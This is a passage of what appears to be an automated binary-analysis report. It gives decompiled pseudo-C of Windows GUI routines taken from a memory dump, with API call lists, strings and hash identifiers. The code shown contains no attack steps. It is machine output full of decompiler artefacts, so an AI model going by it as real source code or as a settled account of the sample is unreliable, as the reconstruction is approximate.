*[fs:eax] = 0; 				if( *(_v8 + 0x278) == 4 ||  *(_v8 + 0x278) == 6 &&  *((char*)(_v8 + 0x277)) == 1) { 					if( *((char*)(_v8 + 0x277)) != 1) { 						_t344 = E00454604() -  *(_v8 + 0x48); 						__eflags = _t344; 						_t345 = _t344 >> 1; 						if(_t344 < 0) { 							asm("adc ebx, 0x0"); 						} 						_t400 = E004545F8() -  *(_v8 + 0x4c); 						__eflags = _t400; 						_t401 = _t400 >> 1; 						if(_t400 < 0) { 							asm("adc esi, 0x0"); 						} 					} else { 						_t266 =  *0x466580; // 0x26df470 						_t348 = E0043A398( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x48); 						_t345 = _t348 >> 1; 						if(_t348 < 0) { 							asm("adc ebx, 0x0"); 						} 						_t270 =  *0x466580; // 0x26df470 						_t403 = E0043A3DC( *((intOrPtr*)(_t270 + 0x44))) -  *(_v8 + 0x4c); 						_t401 = _t403 >> 1; 						if(_t403 < 0) { 							asm("adc esi, 0x0"); 						} 					} 					if(_t345 < E0045461C()) { 						_t345 = E0045461C(); 					} 					if(_t401 < E00454610()) { 						_t401 = E00454610(); 					} 					 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48)); 					if( *((char*)(_v8 + 0x57)) != 0) { 						E00450A44(_v8); 					} 					goto L59; 				} else { 					_t276 =  *(_v8 + 0x278) & 0x000000ff; 					__eflags = _t276 + 0xfa - 2; 					if(_t276 + 0xfa - 2 >= 0) { 						__eflags = _t276 - 5; 						if(_t276 == 5) { 							_t277 = _v8; 							__eflags =  *((char*)(_t277 + 0x277)) - 1; 							if( *((char*)(_t277 + 0x277)) != 1) { 								_t350 = E00454634() -  *(_v8 + 0x48); 								__eflags = _t350; 								_t351 = _t350 >> 1; 								if(_t350 < 0) { 									asm("adc ebx, 0x0"); 								} 								_t405 = E00454628() -  *(_v8 + 0x4c); 								__eflags = _t405; 								_t406 = _t405 >> 1; 								if(_t405 < 0) { 									asm("adc esi, 0x0"); 								} 							} else { 								_t290 =  *0x466580; // 0x26df470 								_t354 = E0043A398( *((intOrPtr*)(_t290 + 0x44))) -  *(_v8 + 0x48); 								__eflags = _t354; 								_t351 = _t354 >> 1; 								if(_t354 < 0) { 									asm("adc ebx, 0x0"); 
								} 								_t294 =  *0x466580; // 0x26df470 								_t408 = E0043A3DC( *((intOrPtr*)(_t294 + 0x44))) -  *(_v8 + 0x4c); 								__eflags = _t408; 								_t406 = _t408 >> 1; 								if(_t408 < 0) { 									asm("adc esi, 0x0"); 								} 							} 							__eflags = _t351; 							if(_t351 < 0) { 								_t351 = 0; 								__eflags = 0; 							} 							__eflags = _t406; 							if(_t406 < 0) { 								_t406 = 0; 								__eflags = 0; 							} 							 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48)); 						} 					} else { 						_t298 =  *0x466580; // 0x26df470 						_t409 =  *(_t298 + 0x44); 						_t299 = _v8; 						__eflags =  *((char*)(_t299 + 0x278)) - 7; 						if( *((char*)(_t299 + 0x278)) == 7) { 							_t391 =  *0x44b288; // 0x44b2d4 							_t333 = E00403AB4( *(_v8 + 4), _t391); 							__eflags = _t333; 							if(_t333 != 0) { 								_t409 =  *(_v8 + 4); 							} 						} 						__eflags = _t409; 						if(_t409 == 0) { 							_t356 = E00454604() -  *(_v8 + 0x48); 							__eflags = _t356; 							_t357 = _t356 >> 1; 							if(_t356 < 0) { 								asm("adc ebx, 0x0"); 							} 							_t411 = E004545F8() -  *(_v8 + 0x4c); 							__eflags = _t411; 							_t412 = _t411 >> 1; 							if(_t411 < 0) { 								asm("adc esi, 0x0"); 							} 						} else { 							_t359 = E0044ED88(_t409); 							_t326 =  *((intOrPtr*)(_t409 + 0x48)) -  *(_v8 + 0x48); 							__eflags = _t326; 							_t327 = _t326 >> 1; 							if(_t326 < 0) { 								asm("adc eax, 0x0"); 							} 							_t357 = _t359 + _t327; 							_t329 = E0044EDA8(_t409); 							_t389 =  *((intOrPtr*)(_t409 + 0x4c)) -  *(_v8 + 0x4c); 							__eflags = _t389; 							_t390 = _t389 >> 1; 							if(_t389 < 0) { 								asm("adc edx, 0x0"); 							} 							_t412 = _t329 + _t390; 						} 						_t307 = E0045461C(); 						__eflags = _t357 - _t307; 						if(_t357 < _t307) { 							_t357 = E0045461C(); 						} 						_t309 = E00454610(); 						__eflags = _t412 - _t309; 						if(_t412 < _t309) { 							_t412 = 
E00454610(); 						} 						 *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c),  *(_v8 + 0x48)); 						_t316 = _v8; 						__eflags =  *((char*)(_t316 + 0x57)); 						if( *((char*)(_t316 + 0x57)) != 0) { 							E00450A44(_v8); 						} 					} 					L59: 					 *(_v8 + 0x278) = 0; 					if( *((char*)(_v8 + 0x277)) != 1) { 						ShowWindow(E004423F8(_v8),  *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); 					} else { 						if( *(_v8 + 0x273) != 2) { 							ShowWindow(E004423F8(_v8),  *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); 							_t241 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010; 							__eflags = _t241; 							CallWindowProcA(0x406e4c, E004423F8(_v8), 5, 0, _t241); 							E0043AC50(_v8); 						} else { 							_t252 = E004423F8(_v8); 							_t253 =  *0x466580; // 0x26df470 							SendMessageA( *( *((intOrPtr*)(_t253 + 0x44)) + 0x29c), 0x223, _t252, 0); 							ShowWindow(E004423F8(_v8), 3); 						} 						_t247 =  *0x466580; // 0x26df470 						SendMessageA( *( *((intOrPtr*)(_t247 + 0x44)) + 0x29c), 0x234, 0, 0); 					} 					goto L82; 				} 			}                        

                                                                            0x00452cb4
                                                                            0x00452cb4
                                                                            0x00452cb2
                                                                            0x00452cf7
                                                                            0x00452d03
                                                                            0x00452d03
                                                                            0x00452d11
                                                                            0x00452d1d
                                                                            0x00452d1d
                                                                            0x00452d36
                                                                            0x00452d43
                                                                            0x00452d4c
                                                                            0x00452d4c
                                                                            0x00000000
                                                                            0x00452d56
                                                                            0x00452d59
                                                                            0x00452d65
                                                                            0x00452d68
                                                                            0x00452e76
                                                                            0x00452e78
                                                                            0x00452e7e
                                                                            0x00452e81
                                                                            0x00452e88
                                                                            0x00452ed3
                                                                            0x00452ed3
                                                                            0x00452ed6
                                                                            0x00452ed8
                                                                            0x00452eda
                                                                            0x00452eda
                                                                            0x00452eec
                                                                            0x00452eec
                                                                            0x00452eef
                                                                            0x00452ef1
                                                                            0x00452ef3
                                                                            0x00452ef3
                                                                            0x00452e8a
                                                                            0x00452e8a
                                                                            0x00452e9c
                                                                            0x00452e9c
                                                                            0x00452e9f
                                                                            0x00452ea1
                                                                            0x00452ea3
                                                                            0x00452ea3
                                                                            0x00452ea6
                                                                            0x00452eb8
                                                                            0x00452eb8
                                                                            0x00452ebb
                                                                            0x00452ebd
                                                                            0x00452ebf
                                                                            0x00452ebf
                                                                            0x00452ebd
                                                                            0x00452ef6
                                                                            0x00452ef8
                                                                            0x00452efa
                                                                            0x00452efa
                                                                            0x00452efa
                                                                            0x00452efc
                                                                            0x00452efe
                                                                            0x00452f00
                                                                            0x00452f00
                                                                            0x00452f00
                                                                            0x00452f19
                                                                            0x00452f19
                                                                            0x00452d6e
                                                                            0x00452d6e
                                                                            0x00452d73
                                                                            0x00452d76
                                                                            0x00452d79
                                                                            0x00452d80
                                                                            0x00452d88
                                                                            0x00452d8e
                                                                            0x00452d93
                                                                            0x00452d95
                                                                            0x00452d9a
                                                                            0x00452d9a
                                                                            0x00452d95
                                                                            0x00452d9d
                                                                            0x00452d9f
                                                                            0x00452de8
                                                                            0x00452de8
                                                                            0x00452deb
                                                                            0x00452ded
                                                                            0x00452def
                                                                            0x00452def
                                                                            0x00452e01
                                                                            0x00452e01
                                                                            0x00452e04
                                                                            0x00452e06
                                                                            0x00452e08
                                                                            0x00452e08
                                                                            0x00452da1
                                                                            0x00452da8
                                                                            0x00452db0
                                                                            0x00452db0
                                                                            0x00452db3
                                                                            0x00452db5
                                                                            0x00452db7
                                                                            0x00452db7
                                                                            0x00452dba
                                                                            0x00452dbe
                                                                            0x00452dc9
                                                                            0x00452dc9
                                                                            0x00452dcc
                                                                            0x00452dce
                                                                            0x00452dd0
                                                                            0x00452dd0
                                                                            0x00452dd5
                                                                            0x00452dd5
                                                                            0x00452e10
                                                                            0x00452e15
                                                                            0x00452e17
                                                                            0x00452e23
                                                                            0x00452e23
                                                                            0x00452e2a
                                                                            0x00452e2f
                                                                            0x00452e31
                                                                            0x00452e3d
                                                                            0x00452e3d
                                                                            0x00452e56
                                                                            0x00452e5c
                                                                            0x00452e5f
                                                                            0x00452e63
                                                                            0x00452e6c
                                                                            0x00452e6c
                                                                            0x00452e63
                                                                            0x00452f1f
                                                                            0x00452f22
                                                                            0x00452f33
                                                                            0x00453009
                                                                            0x00452f39
                                                                            0x00452f43
                                                                            0x00452f96
                                                                            0x00452faa
                                                                            0x00452faa
                                                                            0x00452fbf
                                                                            0x00452fc7
                                                                            0x00452f45
                                                                            0x00452f4a
                                                                            0x00452f55
                                                                            0x00452f64
                                                                            0x00452f74
                                                                            0x00452f74
                                                                            0x00452fd5
                                                                            0x00452fe4
                                                                            0x00452fe4
                                                                            0x00000000
                                                                            0x00452f33

                                                                            Strings
                                                                            • x5B , xrefs: 00452BAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: x5B
                                                                            • API String ID: 2948472770-2671772400
                                                                            • Opcode ID: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29
                                                                            • Instruction ID: fdf0033afcd44717c8607ee86a32dba8197f5f55c0a5171d2b836c552c812610
                                                                            • Opcode Fuzzy Hash: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29
                                                                            • Instruction Fuzzy Hash: E6026F31A00204EFDB10DF69DA86B9D77F4AB05305F1504AAFD04EB3A3D7B8AE449B49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
E00405CBC(CHAR* __eax, int __edx) {
    CHAR* _v8;
    int _v12;
    CHAR* _v16;
    void* _v20;
    struct _WIN32_FIND_DATAA _v338;
    char _v599;
    void* _t102;
    intOrPtr* _t103;
    CHAR* _t106;
    CHAR* _t108;
    char* _t109;
    void* _t110;

    _v12 = __edx;
    _v8 = __eax;
    _v16 = _v8;
    _v20 = GetModuleHandleA("kernel32.dll");
    if(_v20 == 0) {
        L4:
        if( *_v8 != 0x5c) {
            _t108 = &(_v8[2]);
            goto L10;
        } else {
            if(_v8[1] == 0x5c) {
                _t109 = E00405C9C( &(_v8[2]));
                if( *_t109 != 0) {
                    _t17 = _t109 + 1; // 0x1
                    _t108 = E00405C9C(_t17);
                    if( *_t108 != 0) {
                        L10:
                        _t102 = _t108 - _v8;
                        lstrcpynA( &_v599, _v8, _t102 + 1);
                        while( *_t108 != 0) {
                            _t106 = E00405C9C( &(_t108[1]));
                            if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                                lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
                                _v20 = FindFirstFileA( &_v599, &_v338);
                                if(_v20 != 0xffffffff) {
                                    FindClose(_v20);
                                    if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                                        *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                                        lstrcpynA( &(( &(( &_v599)[_t102]))[1]), &(_v338.cFileName), 0x105 - _t102 - 1);
                                        _t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                                        _t108 = _t106;
                                        continue;
                                    }
                                }
                            }
                            goto L17;
                        }
                        lstrcpynA(_v8, &_v599, _v12);
                    }
                }
            }
        }
    } else {
        _t103 = GetProcAddress(_v20, "GetLongPathNameA");
        if(_t103 == 0) {
            goto L4;
        } else {
            _push(0x105);
            _push( &_v599);
            _push(_v8);
            if( *_t103() == 0) {
                goto L4;
            } else {
                lstrcpynA(_v8, &_v599, _v12);
            }
        }
    }
    L17:
    return _v16;
}
          


                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00400000,00461790), ref: 00405CD9
                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405CF0
                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 00405D20
                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405D84
                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DBA
                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DCD
                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DDF
                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DEB
                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000), ref: 00405E1F
                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00405E2B
                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405E4D
                                                                            Strings
                                                                            • kernel32.dll , xrefs: 00405CD4
                                                                            • GetLongPathNameA , xrefs: 00405CE7
                                                                            • \ , xrefs: 00405DFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                            • API String ID: 3245196872-1565342463
                                                                            • Opcode ID: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7
                                                                            • Instruction ID: ed9b063c7604b8117c629610380ef8646edce7950b787036461636691dd4187e
                                                                            • Opcode Fuzzy Hash: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7
                                                                            • Instruction Fuzzy Hash: AF415171900658ABDB10EBE8CC89ADFB3ACEF04304F1444BBA558F7281D6789F408F58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                                                                                  E004342B4(intOrPtr __eax, void* __ebx, int* __edx, void* __edi, void* __esi) { 				intOrPtr _v8; 				struct HMENU__* _v12; 				signed int _v16; 				signed int _v17; 				intOrPtr _v24; 				int _v28; 				struct HDC__* _v32; 				intOrPtr _v36; 				intOrPtr _v40; 				intOrPtr _v44; 				intOrPtr* _v48; 				char _v52; 				intOrPtr _t137; 				signed int _t138; 				signed int _t151; 				signed int _t152; 				intOrPtr* _t154; 				void* _t159; 				struct HMENU__* _t161; 				intOrPtr* _t166; 				void* _t174; 				signed int _t178; 				signed int _t182; 				void* _t183; 				void* _t215; 				void* _t253; 				signed int _t259; 				void* _t267; 				signed int _t273; 				signed int _t274; 				signed int _t276; 				signed int _t277; 				signed int _t279; 				signed int _t280; 				signed int _t282; 				signed int _t283; 				signed int _t285; 				signed int _t286; 				signed int _t288; 				signed int _t289; 				signed int _t292; 				signed int _t293; 				intOrPtr _t313; 				intOrPtr _t335; 				intOrPtr _t344; 				intOrPtr _t348; 				intOrPtr* _t355; 				signed int _t357; 				intOrPtr* _t358; 				signed int _t369; 				signed int _t370; 				signed int _t371; 				signed int _t372; 				signed int _t373; 				signed int _t374; 				signed int _t375; 				int* _t377; 				void* _t379; 				void* _t380; 				intOrPtr _t381; 				void* _t382;  				_t379 = _t380; 				_t381 = _t380 + 0xffffffd0; 				_v52 = 0; 				_t377 = __edx; 				_v8 = __eax; 				_push(_t379); 				_push(0x4347e8); 				_push( *[fs:eax]); 				 *[fs:eax] = _t381; 				_t137 =  *((intOrPtr*)(__edx)); 				_t382 = _t137 - 0x111; 				if(_t382 > 0) { 					_t138 = _t137 - 0x117; 					__eflags = _t138; 					if(_t138 == 0) { 						_t273 =  *((intOrPtr*)(_v8 + 8)) - 1; 						__eflags = _t273; 						if(_t273 < 0) { 							goto L67; 						} else { 							_t274 = _t273 + 1; 							_t369 = 0; 							__eflags = 0; 							
while(1) { 								_t151 = E004333E0(E0041A80C(_v8, _t369), _t377[1], __eflags); 								__eflags = _t151; 								if(_t151 != 0) { 									goto L68; 								} 								_t369 = _t369 + 1; 								_t274 = _t274 - 1; 								__eflags = _t274; 								if(_t274 != 0) { 									continue; 								} else { 									goto L67; 								} 								goto L68; 							} 						} 					} else { 						_t152 = _t138 - 8; 						__eflags = _t152; 						if(_t152 == 0) { 							_v17 = 0; 							__eflags =  *(__edx + 6) & 0x00000010; 							if(( *(__edx + 6) & 0x00000010) != 0) { 								_v17 = 1; 							} 							_t276 =  *((intOrPtr*)(_v8 + 8)) - 1; 							__eflags = _t276; 							if(__eflags < 0) { 								L32: 								_t154 =  *0x462da4; // 0x466580 								E004579C0( *_t154, 0, __eflags); 								goto L67; 							} else { 								_t277 = _t276 + 1; 								_t370 = 0; 								__eflags = 0; 								while(1) { 									__eflags = _v17 - 1; 									if(_v17 != 1) { 										_v12 = _t377[1] & 0x0000ffff; 									} else { 										_t161 = _t377[2]; 										__eflags = _t161; 										if(_t161 == 0) { 											_v12 = 0xffffffff; 										} else { 											_v12 = GetSubMenu(_t161, _t377[1] & 0x0000ffff); 										} 									} 									_t159 = E0041A80C(_v8, _t370); 									_t297 = _v17 & 0x000000ff; 									_v16 = E00433324(_t159, _v17 & 0x000000ff, _v12); 									__eflags = _v16; 									if(__eflags != 0) { 										break; 									} 									_t370 = _t370 + 1; 									_t277 = _t277 - 1; 									__eflags = _t277; 									if(__eflags != 0) { 										continue; 									} else { 										goto L32; 									} 									goto L68; 								} 								E00437730( *((intOrPtr*)(_v16 + 0x58)), _t297,  &_v52, __eflags); 								_t166 =  *0x462da4; // 0x466580 								E004579C0( *_t166, _v52, __eflags); 							} 						} else { 							__eflags = _t152 == 1; 							if(_t152 == 1) { 								_t279 =  *((intOrPtr*)(_v8 + 8)) - 1; 								__eflags = _t279; 								if(_t279 < 0) { 									
goto L67; 								} else { 									_t280 = _t279 + 1; 									_t371 = 0; 									__eflags = 0; 									while(1) { 										_v48 = E0041A80C(_v8, _t371); 										_t174 =  *((intOrPtr*)( *_v48 + 0x34))(); 										__eflags = _t174 - _t377[2]; 										if(_t174 == _t377[2]) { 											break; 										} 										_t178 = E00433324(_v48, 1, _t377[2]); 										__eflags = _t178; 										if(_t178 == 0) { 											_t371 = _t371 + 1; 											_t280 = _t280 - 1; 											__eflags = _t280; 											if(_t280 != 0) { 												continue; 											} else { 												goto L67; 											} 										} else { 											break; 										} 										goto L68; 									} 									L00433E94(_v48, _t377); 								} 							} else { 								goto L67; 							} 						} 					} 					goto L68; 				} else { 					if(_t382 == 0) { 						_t282 =  *((intOrPtr*)(_v8 + 8)) - 1; 						__eflags = _t282; 						if(_t282 < 0) { 							goto L67; 						} else { 							_t283 = _t282 + 1; 							_t372 = 0; 							__eflags = 0; 							while(1) { 								E0041A80C(_v8, _t372); 								_t182 = E004333C4(_t377[1] & 0x0000ffff, __eflags); 								__eflags = _t182; 								if(_t182 != 0) { 									goto L68; 								} 								_t372 = _t372 + 1; 								_t283 = _t283 - 1; 								__eflags = _t283; 								if(_t283 != 0) { 									continue; 								} else { 									goto L67; 								} 								goto L68; 							} 						} 						goto L68; 					} else { 						_t183 = _t137 - 0x2b; 						if(_t183 == 0) { 							_v40 =  *((intOrPtr*)(__edx + 8)); 							_t285 =  *((intOrPtr*)(_v8 + 8)) - 1; 							__eflags = _t285; 							if(_t285 < 0) { 								goto L67; 							} else { 								_t286 = _t285 + 1; 								_t373 = 0; 								__eflags = 0; 								while(1) { 									_v16 = E00433324(E0041A80C(_v8, _t373), 0,  *((intOrPtr*)(_v40 + 8))); 									__eflags = _v16; 									if(_v16 != 0) { 										break; 									} 									_t373 = _t373 + 1; 									_t286 = _t286 - 1; 									__eflags = 
_t286; 									if(_t286 != 0) { 										continue; 									} else { 										goto L67; 									} 									goto L69; 								} 								_v24 = E004262D8(0, 1); 								_push(_t379); 								_push(0x43461b); 								_push( *[fs:eax]); 								 *[fs:eax] = _t381; 								_v28 = SaveDC( *(_v40 + 0x18)); 								_push(_t379); 								_push(0x4345fe); 								_push( *[fs:eax]); 								 *[fs:eax] = _t381; 								E004268A4(_v24,  *(_v40 + 0x18)); 								E00426738(_v24); 								E00434AAC(_v16, _v40 + 0x1c, _v24,  *(_v40 + 0x10) & 0x0000ffff); 								_pop(_t335); 								 *[fs:eax] = _t335; 								_push(0x434605); 								__eflags = 0; 								E004268A4(_v24, 0); 								return RestoreDC( *(_v40 + 0x18), _v28); 							} 						} else { 							_t215 = _t183 - 1; 							if(_t215 == 0) { 								_v44 =  *((intOrPtr*)(__edx + 8)); 								_t288 =  *((intOrPtr*)(_v8 + 8)) - 1; 								__eflags = _t288; 								if(_t288 < 0) { 									goto L67; 								} else { 									_t289 = _t288 + 1; 									_t374 = 0; 									__eflags = 0; 									while(1) { 										_v16 = E00433324(E0041A80C(_v8, _t374), 0,  *((intOrPtr*)(_v44 + 8))); 										__eflags = _v16; 										if(_v16 != 0) { 											break; 										} 										_t374 = _t374 + 1; 										_t289 = _t289 - 1; 										__eflags = _t289; 										if(_t289 != 0) { 											continue; 										} else { 											goto L67; 										} 										goto L69; 									} 									_v32 = GetWindowDC( *(_v8 + 0x10)); 									 *[fs:eax] = _t381; 									_v24 = E004262D8(0, 1); 									 *[fs:eax] = _t381; 									_v28 = SaveDC(_v32); 									 *[fs:eax] = _t381; 									E004268A4(_v24, _v32); 									E00426738(_v24); 									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43471c, _t379,  *[fs:eax], 0x434739, _t379,  *[fs:eax], 0x43475e, _t379); 									_pop(_t344); 									 *[fs:eax] = _t344; 									_push(0x434723); 									__eflags = 0; 									E004268A4(_v24, 0); 									return RestoreDC(_v32, 
_v28); 								} 							} else { 								if(_t215 == 0x27) { 									_v36 =  *((intOrPtr*)(__edx + 8)); 									_t292 =  *((intOrPtr*)(_v8 + 8)) - 1; 									__eflags = _t292; 									if(_t292 < 0) { 										goto L67; 									} else { 										_t293 = _t292 + 1; 										_t375 = 0; 										__eflags = 0; 										while(1) { 											_t253 =  *((intOrPtr*)( *((intOrPtr*)(E0041A80C(_v8, _t375))) + 0x34))(); 											_t348 = _v36; 											__eflags = _t253 -  *((intOrPtr*)(_t348 + 0xc)); 											if(_t253 !=  *((intOrPtr*)(_t348 + 0xc))) { 												_v16 = E00433324(E0041A80C(_v8, _t375), 1,  *((intOrPtr*)(_v36 + 0xc))); 											} else { 												_v16 =  *((intOrPtr*)(E0041A80C(_v8, _t375) + 0x34)); 											} 											__eflags = _v16; 											if(_v16 != 0) { 												break; 											} 											_t375 = _t375 + 1; 											_t293 = _t293 - 1; 											__eflags = _t293; 											if(_t293 != 0) { 												continue; 											} else { 												goto L67; 											} 											goto L68; 										} 										_t259 = E00433354(E0041A80C(_v8, _t375), 1,  *((intOrPtr*)(_v36 + 8))); 										__eflags = _t259; 										if(_t259 == 0) { 											_t267 = E0041A80C(_v8, _t375); 											__eflags = 0; 											_t259 = E00433354(_t267, 0,  *((intOrPtr*)(_v36 + 0xc))); 										} 										_t355 =  *0x462f14; // 0x466584 										_t357 =  *( *_t355 + 0x6c); 										__eflags = _t357; 										if(_t357 != 0) { 											__eflags = _t259; 											if(_t259 == 0) { 												_t259 =  *(_t357 + 0x160); 											} 											__eflags =  *(_t357 + 0x270) & 0x00000008; 											if(( *(_t357 + 0x270) & 0x00000008) == 0) { 												_t358 =  *0x462da4; // 0x466580 												E004575F4( *_t358, _t293, _t259, _t375, _t377); 											} else { 												E0045767C(); 											} 										} 									} 								} else { 									L67: 									_t377[3] = DefWindowProcA( *(_v8 + 0x10),  *_t377, _t377[1], _t377[2]); 					
			} 								L68: 								_pop(_t313); 								 *[fs:eax] = _t313; 								_push(0x4347ef); 								return E0040473C( &_v52); 							} 						} 					} 				} 				L69: 			}                        

                                                                            0x004347d4
                                                                            0x004347d7
                                                                            0x004347da
                                                                            0x004347e7
                                                                            0x004347e7
                                                                            0x004342ea
                                                                            0x004342e3
                                                                            0x004342de
                                                                            0x00000000

                                                                            APIs
                                                                            • SaveDC.GDI32(?), ref: 00434584
                                                                            • RestoreDC.GDI32(?,?), ref: 004345F8
                                                                            • GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672
                                                                            • SaveDC.GDI32(?), ref: 004346A9
                                                                            • RestoreDC.GDI32(?,?), ref: 00434716
                                                                            • DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA
                                                                            Strings
                                                                            • PSC , xrefs: 00434562, 0043468A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: RestoreSaveWindow$Proc
                                                                            • String ID: PSC
                                                                            • API String ID: 1975259465-3988711711
                                                                            • Opcode ID: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a
                                                                            • Instruction ID: e2bc05db2e98f798f29eef0ec9ad69615c0f825a7202cf89475d9a585c1b255b
                                                                            • Opcode Fuzzy Hash: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a
                                                                            • Instruction Fuzzy Hash: E1E14C74A006059FCB10EFA9C5819AEF3F5EF8D304F619166E801A7361C738ED42CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E0044F3A8(intOrPtr __eax, struct HWND__** __edx) {
	intOrPtr _v8;
	int _v12;
	intOrPtr _v16;
	struct HDC__* _v20;
	struct HWND__* _v24;
	void* __ebp;
	struct HWND__* _t100;
	intOrPtr _t110;
	struct HWND__* _t111;
	intOrPtr _t115;
	intOrPtr _t116;
	intOrPtr _t132;
	intOrPtr _t135;
	struct HWND__* _t141;
	struct HWND__* _t144;
	intOrPtr _t148;
	struct HWND__* _t149;
	intOrPtr _t150;
	intOrPtr _t151;
	struct HWND__* _t153;
	struct HWND__* _t156;
	intOrPtr _t162;
	intOrPtr _t192;
	struct HWND__** _t221;
	void* _t224;
	struct HWND__* _t242;
	struct HWND__* _t243;
	struct HWND__* _t245;
	void* _t258;
	void* _t259;
	intOrPtr _t265;
	intOrPtr _t273;
	struct HWND__* _t277;
	struct HWND__* _t278;
	struct HWND__* _t279;
	struct HWND__* _t284;
	struct HWND__* _t285;
	struct HWND__* _t286;
	struct HWND__* _t287;
	void* _t289;
	void* _t291;
	intOrPtr _t292;
	void* _t294;
	void* _t298;

	_t289 = _t291;
	_t292 = _t291 + 0xffffffec;
	_t221 = __edx;
	_v8 = __eax;
	_t100 =  *__edx;
	_t242 = _t100;
	_t294 = _t242 - 0x46;
	if(_t294 > 0) {
		_t243 = _t242 - 0xb01a;
		__eflags = _t243;
		if(_t243 == 0) {
			__eflags =  *(_v8 + 0x94);
			if(__eflags != 0) {
				E00403B24(_v8, __eflags);
			}
		} else {
			_t245 = _t243 - 1;
			__eflags = _t245;
			if(_t245 == 0) {
				__eflags =  *(_v8 + 0x94);
				if(__eflags != 0) {
					E00403B24(_v8, __eflags);
				}
			} else {
				__eflags = _t245 == 0x2c;
				if(_t245 == 0x2c) {
					_t284 = __edx[1];
					_t277 = 0;
					while(1) {
						__eflags = _t284;
						if(_t284 == 0) {
							break;
						}
						__eflags = _t277;
						if(_t277 == 0) {
							_t277 = E0043747C(_t284, _t224);
							_t284 = GetParent(_t284);
							continue;
						}
						break;
					}
					__eflags = _t277;
					if(_t277 != 0) {
						_t285 = E0044CE28(_t277);
						_t110 = _v8;
						__eflags = _t277 -  *((intOrPtr*)(_t110 + 0x268));
						if(_t277 !=  *((intOrPtr*)(_t110 + 0x268))) {
							L28:
							__eflags = _t285;
							if(_t285 != 0) {
								__eflags = _t285 - _v8;
								if(_t285 == _v8) {
									L31:
									_t111 =  *(_t285 + 0x268);
									__eflags = _t111;
									if(_t111 != 0) {
										__eflags = _t277 - _t111;
										if(_t277 != _t111) {
											__eflags = 0;
